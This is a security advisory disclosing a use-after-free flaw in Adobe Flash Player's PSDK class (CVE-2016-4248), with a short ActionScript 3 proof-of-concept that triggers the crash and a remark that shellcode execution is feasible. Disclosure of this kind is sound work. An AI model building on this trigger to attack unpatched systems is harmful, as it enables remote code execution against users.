Adobe Flash Player PSDK Class Use After Free Vulnerability

I. Summary Adobe Flash Player is prone to a vulnerability which leads to Use After Free. Since the release condition is highly controllable, it is feasible to build a fully working exploit for shellcode execution with proper AS3 object occupied the original PSDK memory. ------------------------------------------------------------------ II. Description PSDK Class expose a member function "release()", which can be called directly to release the inner memory of PSDK.pSDK. However, Not all of PSDK's AS3 references are cleaned, it is still possible to invoke virtual functions on a release memory block. Source Code of crash.swf: package { import com.adobe.tvsdk.mediacore.PSDK; import flash.display.Sprite; public class poc extends Sprite { public function poc() { var ps:PSDK = PSDK.pSDK; var ps_:PSDK = PSDK.pSDK; ps.release(); ps_.currentTime; } } } ------------------------------------------------------------------ III. Impact Use After Free ------------------------------------------------------------------ IV. Affected Adobe Flash Player 22.0.0.192 ------------------------------------------------------------------ V. Credit Wen Guanxing from Pangu LAB is credited for this vulnerability. It has been assigned as CVE-2016-4248 by Adobe: https://helpx.adobe.com/security/products/flash-player/apsb16-25.html